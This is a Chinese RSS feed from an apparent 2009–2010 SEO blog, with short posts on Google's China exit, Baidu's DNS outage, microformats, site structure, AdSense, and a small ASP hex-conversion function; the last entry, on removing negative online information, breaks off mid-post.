<p>因此，还在以&ldquo;搜索引擎无法运行JS脚本&rdquo;为战略指导思想实施黑帽seo的朋友可要多一个心眼了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-19 19:14:49]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[传google将退出中国，google.cn关闭]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/googletuichuzhongguo1132.html]]></link><description><![CDATA[<blockquote>
<p>&ldquo;1月13日消息,据新浪网援引国外媒体报道称,谷歌在其官方博客上宣布,该公司不愿再对其中国版搜索引擎Google.cn的搜索结果进行审查,并承认这项决定或许意味着<a href="http://www.Google.cn">www.Google.cn</a>将不得不关闭,可能谷歌驻中国的办事处也会关闭&rdquo;</p>
</blockquote>
<p>一早听到这样的消息，真是令人震撼啊。</p>
<p>google这几年在中国的业务开展并不尽人意，这里包括了战略上（google的&ldquo;最短时间内让用户离开&rdquo;的宗旨跟百度&ldquo;尽可能让用户在百度站内找到需要的内容&rdquo;），公关（墙，审核），甚至包括技术上（分词）等等一系列的问题。导致现在google实际占有中国市场的份额不超过18%&hellip;&hellip;并且增长速度与国内网民增长的速度并不匹配。</p>
<p>然而google.cn的存在对于国内互联网生态的影响是巨大的。最重要的一点，倘若没有了google，百度的商业化将会达到怎样一种可怕的程度。并且google的存在会让互联网更加开放&mdash;&mdash;我不说，你也知道是啥&mdash;&mdash;。而一旦google.cn关闭，我们将越快地步入全球最大的局域网这一轨道中。</p>
<p>但是我对这一传言仍有许多疑问。</p>
<p>综合报道来看，google决定退出中国市场的缘由是由于对搜素的审查机制，违背了google不作恶的原则。google或许是个讲原则的公司，然而google首先是个商业公司，必须对股东负责，google在中国业务尽管不尽人意，但是毕竟盈利了。而且报道中也说了，当日google股价大跌。说明投资者并不认可这一传闻的可行性，毕竟，中国市场作为一个高速发展潜力巨大，且目前规模就已经极为庞大的市场，这个时候退出，太可惜了。</p>
<p>如此说来，可能是有人陷害，有陷害动机的人太多啦，远的，华尔街的投资者向来喜欢用消息操纵股价，近的，各位别忘了，昨天还发生了一件大事，由于被黑，<a href="http://www.001pp.com/sousuoyinqingyouhua/baiduwufadakai928.html">百度无法打开</a>,是不是有人要转移话题呢？要知道，昨天百度回应被黑事件，也是通过新浪科技最早发布的。。</p>
<p>其实要核实这一传闻也很快，看看google英文官方博客有没有相应的内容就是了，上次所谓<a href="http://www.001pp.com/sousuoyinqingyouhua/googlequxiaopr38.html">google取消pr</a>这一传言就是从原文得知，只是传言而已，然而，这次一般人是无法核实的，无他，google英文博客现在还被墙着呢。</p>
<p><span style="color: #ff0000">非常遗憾。。。不是传言，以下是google博客的快照，&ldquo;YouTube、Facebook、Twitter、Blogger、WordPress&hellip;&hellip;全世界最好的网站和服务，一个个远离中国&rdquo;，难道google也要离开中国么？为了你仍然能够使用&ldquo;全球最好的知识管理工具和生产力工具&rdquo;，为了能够有更多的搜索选择，哪怕是为了不让adsense广告收入消失，请大家行动起来，在你的博客，qq空间，声援google，为google.cn与zf的谈判增加更多的民意筹码，虽然，，这种东西很多时候是卑微的。</span></p>
<p><img alt="" src="/uploadfiles/2010-1/2010113392092.jpg" /></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-13 10:04:30]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[遭遇和谐,百度无法打开]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baiduwufadakai928.html]]></link><description><![CDATA[<p>2010年1月12日9：55分，群友传来消息，百度已经无法打开。据传今日上午8点55分已经出现百度无法访问现象。</p>
<p>使用ping命令ping百度，发现百度域名解析已经出现了问题了，ip指向为174.121.0.7 美国 德克萨斯州休斯顿The Planet互联网。</p>
<p>百度本次的无法访问，让人不禁联想起前段时间51.com，blogbus.com因站内存在所谓&ldquo;黄色内容&rdquo;而被新网停止解析一事，不知道本次百度是否同样的感受到和谐春风的温暖。不过根据大互联网公司的一般做法，域名通常是不在国内注册，而是在国外注册商解析，并使用自身dns的，因此其实被攻击的可能性比被和谐的大，不管怎样，百度的这次罢工对国内互联网用户影响巨大。特别是急需查询资料的用户，可以使用备用方案，通过ip进行访问 网通用&nbsp;&nbsp; <a href="http://202.108.22.5">http://202.108.22.5</a>&nbsp;电信用&nbsp;&nbsp; <a href="http://119.75.213.61">http://119.75.213.61</a></p>
<p>成文于2009年1月12日10：03分，百度仍然无法访问</p>
<p>目前对于百度无法访问的看法有几种</p>
<p>1、百度被和谐。</p>
<p>经查百度的whois资料，发现百度使用的是自身的dns服务器对域名进行解析，且注册商并非国内。其whois信息如下</p>
<blockquote>
<p>Registrant:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Domain&nbsp;Discreet<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ATTN:&nbsp;baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Rua&nbsp;Dr.&nbsp;Brito&nbsp;Camara,&nbsp;n&nbsp;20,&nbsp;1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Funchal,&nbsp;Madeira&nbsp;9000-039<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PT<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Phone:&nbsp;1-902-7495331<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Email:&nbsp;<br />
<br />
&nbsp;&nbsp;&nbsp;Registrar&nbsp;Name....:&nbsp;Register.com<br />
&nbsp;&nbsp;&nbsp;Registrar&nbsp;Whois...:&nbsp;whois.register.com<br />
&nbsp;&nbsp;&nbsp;Registrar&nbsp;Homepage:&nbsp;www.register.com<br />
<br />
&nbsp;&nbsp;&nbsp;Domain&nbsp;Name:&nbsp;baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Created&nbsp;on..............:&nbsp;1999-10-11<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Expires&nbsp;on..............:&nbsp;2014-10-11<br />
<br />
&nbsp;&nbsp;&nbsp;Administrative&nbsp;Contact:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Domain&nbsp;Discreet<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ATTN:&nbsp;baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Rua&nbsp;Dr.&nbsp;Brito&nbsp;Camara,&nbsp;n&nbsp;20,&nbsp;1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Funchal,&nbsp;Madeira&nbsp;9000-039<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PT<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Phone:&nbsp;1-902-7495331<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Email:&nbsp;<br />
<br />
&nbsp;&nbsp;&nbsp;Technical&nbsp;&nbsp;Contact:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Domain&nbsp;Discreet<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ATTN:&nbsp;baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Rua&nbsp;Dr.&nbsp;Brito&nbsp;Camara,&nbsp;n&nbsp;20,&nbsp;1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Funchal,&nbsp;Madeira&nbsp;9000-039<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PT<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Phone:&nbsp;1-902-7495331<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Email:&nbsp;<br />
<br />
&nbsp;&nbsp;&nbsp;DNS&nbsp;Servers:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ns4.baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ns3.baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ns2.baidu.com<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dns.baidu.com</p>
</blockquote>
<p>2、百度被黑</p>
<p>这种可能性最大。估计dns服务器出问题。</p>
<p>&nbsp;10：41分：主域名恢复。包括新闻搜素在内的子域解析还未恢复。</p>
<p>10：50分：<a href="http://www.baidu.com">www.baidu.com</a>主域间歇性无法访问，估计dns解析未能完全恢复，负载集中到一组服务器中。</p>
<p>&nbsp;11：51分：百度发表回应，称其dns服务器被恶意篡改，正在积极解决问题</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-12 12:50:05]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[sas硬盘安装windows2003]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/sasyingpananzhuangwindows2003696.html]]></link><description><![CDATA[<p>1、普通安装，按F6使用软驱，或者usb软驱</p>
<p>2、自行烧录光盘</p>
<p>3、制作usb系统安装盘</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-29 09:38:00]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[语义扩展 microformats或RDFa]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/microformats592.html]]></link><description><![CDATA[<p>microformats或RDFa是目前较为流行的2项语义扩展标准，它们出现的初衷，是希望通过在原有的html代码上增加一些说明，使得搜索引擎也能&ldquo;理解&rdquo;页面所描述的内容。目前看来，两者，特别是微格式（microformats），更侧重于在社交网络方面的应用，例如用html表述一张联系人名片。其microformats标准的代码如下：</p>
<ol class="dp-xml">
    <li class="alt"><span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">div</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;vcard&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>&nbsp;&nbsp;</span></span></li>
    <li><span>&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">div</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;fn&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>&nbsp;姓名:</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">span</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;value&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>&nbsp;偷米饭</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">span</span><span class="tag">&gt;</span></font></strong><span>;</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">div</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
    <li class="alt"><span>&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">div</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;n&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>&nbsp;&nbsp;</span></li>
    <li><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Name: &nbsp;&nbsp;</span></li>
    <li class="alt"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">span</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;value&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>&nbsp;&nbsp;</span></li>
    <li><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">span</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;given-name&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>Tommy</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">span</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
    <li class="alt"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;</span><span class="tag-name">span</span></font></strong><span>&nbsp;</span><span class="attribute"><font color="#ff0000">class</font></span><span>=</span><span class="attribute-value"><font color="#0000ff">&quot;family-name&quot;</font></span><span class="tag"><strong><font color="#006699">&gt;</font></strong></span><span>Fan</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">span</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
    <li><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">span</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
    <li class="alt"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">div</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
    <li><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;... &nbsp;&nbsp;</span></li>
    <li class="alt"><strong><font color="#006699"><span class="tag">&lt;/</span><span class="tag-name">div</span><span class="tag">&gt;</span></font></strong><span>&nbsp;&nbsp;</span></li>
</ol>
<p>对于seo而言，看似用途不大，不过这两种标准目前Google和yahoo已经部分支持了，通过这两项标准，你可以告诉Google和yahoo一个视频的具体信息，包括说明，宽度，高度，甚至包括播放时间。此外，你还可以通过这两项标准，在Google的搜索结果中显示出不一样的评论内容，也就是Google所提到过的&ldquo;富摘要&rdquo;包括</p>
<ul>
    <li>评论的撰写人</li>
    <li>评论的撰写日期</li>
    <li>评分（如 4/5）</li>
    <li>评论数量和平均评分（对于有多条用户评论的内容）。</li>
</ul>
<p><img alt="" src="http://www.googlechinawebmaster.com/uploaded_images/snippet1-775672.jpg" /></p>
<p>而这两项技术更广阔的前景在于，它可能成为Google对抗百度阿拉丁平台的利器。之前以为，对于一些确定性的数据，例如客服电话之类的东西，百度的阿拉丁平台已经是非常不错用户体验了，然而，在海量的互联网信息面前，百度阿拉丁所采用的人工审核的方式会不会出现人力有时穷的情况，出现诸如鱼目混珠之类的情况（事实上已经有朋友发现了这一漏洞并着手实现赚了笔小财了），而这两项语义扩展技术的出现，则比阿拉丁更胜一步，网站不需要去阿拉丁这一平台提交，直接将信息采用microformats或RDFa组织好，搜索引擎自行抓取，例如，对于电影影评信息，阿拉丁平台目前是同时光网，豆瓣合作的。而如果语义扩展技术得以普及，任何一个网站都能够为搜索引擎提供某个电影的影评以及影片信息，这样，搜索引擎在数据源上将获得更多的选择性。被少数几家阿拉丁合作伙伴把持流量的互联网是可怕的，封闭。而相信普及了语义扩展技术后的互联网能评价它的开放性创造更多的奇迹。</p>
<p>以下是一些中文的参考文献</p>
<p>Google博客中的富摘要介绍：<a href="http://www.googlechinawebmaster.com/2009/06/rich-snippets.html">http://www.googlechinawebmaster.com/2009/06/rich-snippets.html</a></p>
<p>关于标记结构化数据：<a href="http://www.google.com/support/webmasters/bin/answer.py?hl=cn&amp;answer=99170">http://www.google.com/support/webmasters/bin/answer.py?hl=cn&amp;answer=99170</a></p>
<p>rdfa标准的中文译本：<a href="http://iws.seu.edu.cn/resource/Translations/RDFa-Primer-Simplified-Chinese.htm#FOAF">http://iws.seu.edu.cn/resource/Translations/RDFa-Primer-Simplified-Chinese.htm#FOAF</a></p>
<p>微格式标准的中文译本：<a href="http://tommyfan.com/blog/skill/microformats_hcard/#a4">http://tommyfan.com/blog/skill/microformats_hcard/#a4</a></p>
<pre>&nbsp;</pre>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-27 22:32:30]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[google大乌龙adsense付款国家签发错误]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/google adsense591.html]]></link><description><![CDATA[<p>来自<a href="http://www.adjie.com/forum-10-1.html">adjie.com</a>的消息，本月的adsense付款，已经有不少站长前往西联领取，不过和往常不同的是，他们无一例外无法取得这笔款项，得到的回复是，这笔款子的付款国家有误。google这次可又搞出了个大乌龙事件。</p>
<p><img alt="" style="width: 557px; height: 79px" src="/uploadfiles/2009-12/20091226024802.jpg" /></p>
<p>不过对此各位个人站长也无需担心。是你的，终究还是你的，相信不久就会重新付款&mdash;&mdash;不过估计要等到节后了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-26 13:42:27]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[用户行为影响搜索结果，引导网站关注内容]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/sousuojieguo544.html]]></link><description><![CDATA[<p>经常有这样一种现象，特别是百度，在上一个更新周期中，也许你某个关键词，假设是&ldquo;甲乙丙丁&rdquo;排在的前列，但是在下一个更新周期，这个排名又不见踪影。除了搜索引擎本身算法的调整外，还有很大一部分的因素是你的排名被用户行为所影响，特别是对于一些长尾词的内页排名。</p>
<p>众所周知，百度会根据用户对搜索结果的点击，来决定是否提升一个结果在serp的表现，所谓的百度点击器，24小时提升排名都是基于这项原理的作弊手段。但是，百度搜集的数据不仅是用来提升某个结果的排名，同时会用于降低某个结果的排名，例如，你的内页优化不错，这次更新周期中，你的结果在整个搜索结果中排名第一，但是绝大部分用户点击你的搜索结果之后一段时间，却又回头点击了其他的搜索结果。这就说明你的这一搜索结果内容质量不佳，用户体验不好。</p>
<p>这一策略的引入，将对于部分seoer造成一定的打击，例如，类似爱聚合，侠客之类的站点，他们所产生的内容，在seo方面的确是有可取之处，然而内容本身的可读性，以及对搜索词语的匹配性是极差的。所以爱聚合的多个演示站，无一例外拥有了大量的收录，然而，流量却极低。这是由于其网站的大量结果都被用户的反馈所印象，导致整站降权。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-26 10:05:29]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[网站扁平化问题]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangzhanbianpinghua35.html]]></link><description><![CDATA[<p>看到一个朋友在我的网站搜索&ldquo;扁平化&rdquo;，猜测他也许希望知道有关网站扁平化的一些问题，在此一并做一个解答。</p>
<p>一、什么是网站扁平化？</p>
<p>&ldquo;扁平化&rdquo;是对网站结构的一种形象的描述，假设你的网站有100个页面，你将这100个页面，全部放到了根目录中，它们和首页的关系如图（手绘的，将就点），这就可以成为扁平化，可以将网站的扁平化结构归纳为，每个页面都尽可能地从物理位置以及逻辑上（链接上）靠近首页：</p>
<p><img height="199" alt="" width="400" src="/uploadfiles/2009-6/2009630480258.jpg" /></p>
<p>二、网站扁平化都是好的么？</p>
<p>对于页面较少的网站，例如本站，这样扁平化的结构是较好的，但是对一些大型的站点，页面较多，扁平化可能带来2个问题，首先，大量的页面都放置在一个目录，例如，几百万个页面一个目录，可能带来性能以及管理效率上的下降。其次，假设页面路径长度是页面权重的一个考量因素，那么扁平化的网站结构可能导致重要的页面得不到凸显&mdash;&mdash;网站的资源是有限的，一个页面得到的权重高，其他页面得到的权重相对的就会低、</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-17 21:55:31]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[asp版十进制转成十六进制函数]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/vbshijinzhizhuanshiliujinzhi44.html]]></link><description><![CDATA[<p>&nbsp;</p>
<p>由于需要监测传入的参数是utf8编码还是gb2312编码，需要用到十进制转十六进制的函数，而vb居然没有内置。。百度了下vb十进制转十六进制,十进制转成十六进制，都没有比较好的解决办法，无奈只能自己写一个，代码如下</p>
<blockquote>
<p>response.Write hex2ten(&quot;E9F&quot;)&amp;&quot;&lt;BR&gt;&quot;<br />
function hex2ten(h)<br />
&nbsp;dim i,all<br />
&nbsp;all=0<br />
&nbsp;for i=1 to len(h)<br />
&nbsp;&nbsp;select case lcase(mid(h,i,1))<br />
&nbsp;&nbsp;&nbsp;case &quot;0&quot;,&quot;1&quot;,&quot;2&quot;,&quot;3&quot;,&quot;4&quot;,&quot;5&quot;,&quot;6&quot;,&quot;7&quot;,&quot;8&quot;,&quot;9&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+cint(mid(h,i,1))*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;a&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+10*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;b&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+11*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;c&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+12*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;d&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+13*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;e&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+14*16^(len(h)-i)<br />
&nbsp;&nbsp;&nbsp;case &quot;f&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;all=all+15*16^(len(h)-i)<br />
&nbsp;&nbsp;end select<br />
&nbsp;next<br />
&nbsp;hex2ten=all<br />
end function</p>
</blockquote>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-12-05 18:32:44]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[写了一个文本自动分类demo]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wenbenfenlei43.html]]></link><description><![CDATA[<p>项目需要用到以城市的方式，对文本进行自动分类，这次没有必要使用VSM，简单做了一个demo ,暂时只支持以下城市的识别：北京 天津 沈阳 大连 哈尔滨 济南 青岛 南京 上海 杭州 武汉 广州 深圳 重庆 成都 西安 石家庄 长春 呼和浩特 太原 郑州 合肥 无锡 苏州 宁波 福州 厦门 南昌 长沙 汕头 珠海 海口 南宁 贵阳 昆明， 地址：<a href="http://www.001pp.com/Categories_by_city.asp">http://www.001pp.com/Categories_by_city.asp</a></p>
<p>回头看看我好像在这方面写了不少东东，放出来的就有这么几个了：</p>
<p><a href="http://www.wannengbaidu.com/" target="_blank"><font color="#0d2857">万能百度</font></a> :可能叫它竞争对手情况分析工具更恰当，通过它搜索某一关键词，可以获得关键词的大致检索量，符合搜索条件的每个页面的PR，外链数，百度收录数。 <br />
<a href="http://www.wannengbaidu.com/weiyuanchuang/" target="_blank"><font color="#0d2857">页面相似度检测</font></a> :使用这个工具可以检测2篇文章的相似程度，如果是新站的话，文章相似程度在85%的百度一般比较难收录 <br />
<a href="http://key.001pp.com/" target="_blank"><font color="#0d2857">关键词查询工具</font></a> :选词一直是一个难点，有时候辛苦半天排名上去了却发现这个词其实没多少流量，这个工具可以查询某个关键词大概的检索量，已经集成到万能百度。 <br />
<a href="http://www.001pp.com/Categories_by_city.asp">文本按城市自动分类</a>：它可以检测文章的主题主要关于哪个城市。</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-11-18 19:31:36]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[如何删除负面信息]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/fumianxinxishanchu42.html]]></link><description><![CDATA[<p>在资讯日益发展的今天，很多个人，企事业单位都曾遭遇过被人在网络上发表不良不利负面信息的情况，那么对于这些负面信息有没有办法删除，如何删除负面信息呢？对于这些负面信息，根据其性质，可以分成两种类别。</p>
<p>1、个别负面信息删除</p>
<p>这类的负面信息通常只是由若干个体发布的，发布的位置通常为个人博客，论坛，数量较少，对于这类的负面信息处理，除了删除负面信息外，还需要尽可能与发布的个体达成沟通或者追究责任，其处理步骤如下</p>
<blockquote>
<p>1、保存信息证据，以备后期司法介入</p>
